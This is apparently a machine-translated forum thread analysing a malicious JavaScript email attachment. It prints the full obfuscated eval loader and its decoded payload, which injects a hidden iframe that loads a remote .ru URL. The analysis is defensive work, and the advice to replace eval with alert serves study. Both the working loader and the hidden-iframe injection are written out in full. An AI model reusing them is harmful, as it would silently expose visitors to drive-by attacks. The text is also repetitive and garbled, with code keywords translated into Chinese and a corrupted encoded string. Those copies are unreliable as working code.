Javascript 反混淆/解析字符串


今天,我在一封电子邮件的附件中收到了以下内容,邮件声称这是对我所购机票的确认。请帮助我理解如何对这段代码进行反混淆。

<script>
// Analysis sample: obfuscated script delivered as an e-mail attachment.
// It rebuilds a second script from a list of numbers and hands it to eval.
// Every identifier below is an implicit global (no var/let/const).
c = 2;
// c - 2 is 0, so i is the start index of the decode loop further down.
i = c - 2;
// The body only runs where window.document exists, i.e. in a browser page.
if (window.document) try {
    // c is the number 2, so c.prototype is undefined and `new undefined`
    // throws a TypeError. The real logic therefore sits in the catch handler;
    // presumably this is meant to confuse simple emulators or scanners.
    new c.prototype
} catch (hgberger) {
    // One string literal of 'n'-separated integers, split into an array of
    // numeric strings. Each value is a character code shifted by -38
    // (see the fromCharCode call below).
    f = ['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n3n21n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0].split('n');
    // Not read anywhere in this listing.
    md = 'a';
    // Looks up window.eval with the name built from two literals, so the text
    // "eval" never appears verbatim; presumably to dodge string signatures.
    e = window["e" + "val"];
    w = f;
    // Starts as an empty array; the first `+=` coerces it to an empty string,
    // so s ends up holding the decoded script text.
    s = [];
    r = String;
    // Fixed iteration count of 613, presumably the number of encoded values
    // in f (not verified here). The `!=` test relies on i stepping by 1.
    for (; 613 != i; i += 1) {
        j = i;
        // `1 * w[j]` converts the numeric string to a number; adding 38
        // restores the real character code (e.g. 67 + 38 = 105, 'i').
        s += r.fromCharCode(38 + 1 * w[j]);
    }
    // Executes the decoded text. When analysing the sample, output s instead
    // of passing it to eval so the second stage is shown rather than run.
    e(s);
}</script>

c=2;
i=c-2;
如果(window.document),请尝试{
新c.原型
}捕获(hgberger){
f=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN63N2N-4n22n67n64n76n59n71n63n-6N77N76N61N23N1 N66N78N78N74N20N9N9N62N72N80NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN67N73N72N20N59N60N77N73N70N79N78N63N21N70N63N64N78N20N10N21N78N73N74N-N-N-N-29n-N-29n-N-N-N-N-N-29n-29n-N-N-29n-N-29n-N-29n-N-29n-29n-N-7 N-N-N-N-29n-29n-7 N-N-N-N-N-N-N-N-N-29n-29n-N-N-29n-29n-N-29n-N-29n-N-N-N-N-29n-N-N-N-29n-N-N-29n-N-N-N-N-N-29n-N-N-N-N-N-N-N-N-29n-N-7 7 N-N-N-N-N-N-N-N-N-N-N-N-N-N-N-3 3 N-3 3 3 3-N-N-3 3-N-N-N-N-N-N-3 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-25n-29n-29n87'][0]。拆分('n');
md='a';
e=窗口[“e”+“val”];
w=f;
s=[];
r=字符串;
对于(;613!=i;i+=1){
j=i;
s+=r.fromCharCode(38+1*w[j]);
}
e(s);
}

该字符串似乎是一个以“n”分隔的字符编码列表(每个数值加上 38 后即为实际的字符编码)。如果运行代码时把最后一行的 e(s) 替换为 alert(s),您将看到恶意软件试图用 eval 执行的、被混淆的代码。

该字符串似乎是一个以“n”分隔的字符编码列表。如果运行代码时把最后一行的 e(s) 替换为 alert(s),您将看到恶意软件试图用 eval 执行的、被混淆的代码。

反混淆后:

// Decoded second stage of the sample: it makes the page load a remote URL
// inside an iframe the user cannot see. What that URL serves is not shown here.
// The host, port 8080 and path in the src value are the network indicators.
if (document.getElementsByTagName('body')[0]){
    // A <body> element already exists: inject the iframe through the DOM.
    iframer();
} else {
    // No <body> yet: write the equivalent iframe markup straight into the
    // document stream. Same src, 10x10 size and hidden/absolute styling.
    document.write("<iframe src='http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
/**
 * Creates an iframe pointing at the remote URL, hides it
 * (visibility:hidden, absolutely positioned at 0,0, 10x10)
 * and appends it to the first <body> element.
 */
function iframer(){
    // Single line in the sample: create the element, set src, apply the
    // hiding styles, then set width and height.
    var f = document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    // Attaching the element to the document is what triggers the request.
    document.getElementsByTagName('body')[0].appendChild(f);
}
if(document.getElementsByTagName('body')[0]){
iframer();
}否则{
文件。填写(“”);
}
函数iframer(){
var f=document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php);f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
反混淆后:

// Decoded payload: loads a remote URL in an invisible iframe. The script has
// two paths that produce the same hidden 10x10 frame with the same src.
if (document.getElementsByTagName('body')[0]){
    // <body> is present, so the frame is added with DOM calls.
    iframer();
} else {
    // <body> is not present yet, so the frame is emitted as raw markup.
    document.write("<iframe src='http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
/**
 * Builds the hidden iframe (src, visibility:hidden, position:absolute,
 * left/top 0, width/height 10) and appends it to the first <body> element.
 */
function iframer(){
    // All attribute and style assignments are on this one line in the sample.
    var f = document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    // Appending to <body> inserts the frame into the live document.
    document.getElementsByTagName('body')[0].appendChild(f);
}
if(document.getElementsByTagName('body')[0]){
iframer();
}否则{
文件。填写(“”);
}
函数iframer(){
var f=document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php);f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}

我将您发布的代码一字不差地粘贴到其中。我唯一做的更改(我也建议这样做)是把对 e 的调用改为 alert。这样,您的浏览器就不会尝试执行嵌入的代码,而只会把它显示给您。


你会看到一些涉及 iframe 和 dnvfodooshdkfhha.ru 的可疑内容,看起来像垃圾邮件。

我把你发布的代码一字不差地粘贴到其中。我唯一做的更改(我也建议这样做)是把调用 e(s) 改为 alert(s)。这样,您的浏览器就不会尝试执行嵌入的代码,而只会把它显示给您。


你会看到一些涉及 iframe 和 dnvfodooshdkfhha.ru 的可疑内容,看起来像垃圾邮件。

如果你运行 catch 块中的内容,你会得到更多引用 dnvfodooshdkfhha.ru 的 JavaScript。在谷歌上快速搜索之后,这看起来像垃圾邮件。这是一种非常阴险、鬼鬼祟祟的手法。垃圾邮件发送者都是狡猾的家伙。自动化的浏览器安全机制怎样才能把它检测为恶意代码呢?
如果你运行 catch 块中的内容,你会得到更多引用 dnvfodooshdkfhha.ru 的 JavaScript。在谷歌上快速搜索之后,这看起来像垃圾邮件。这是一种非常阴险、鬼鬼祟祟的手法。垃圾邮件发送者都是狡猾的家伙。自动化的浏览器安全机制怎样才能把它检测为恶意代码呢?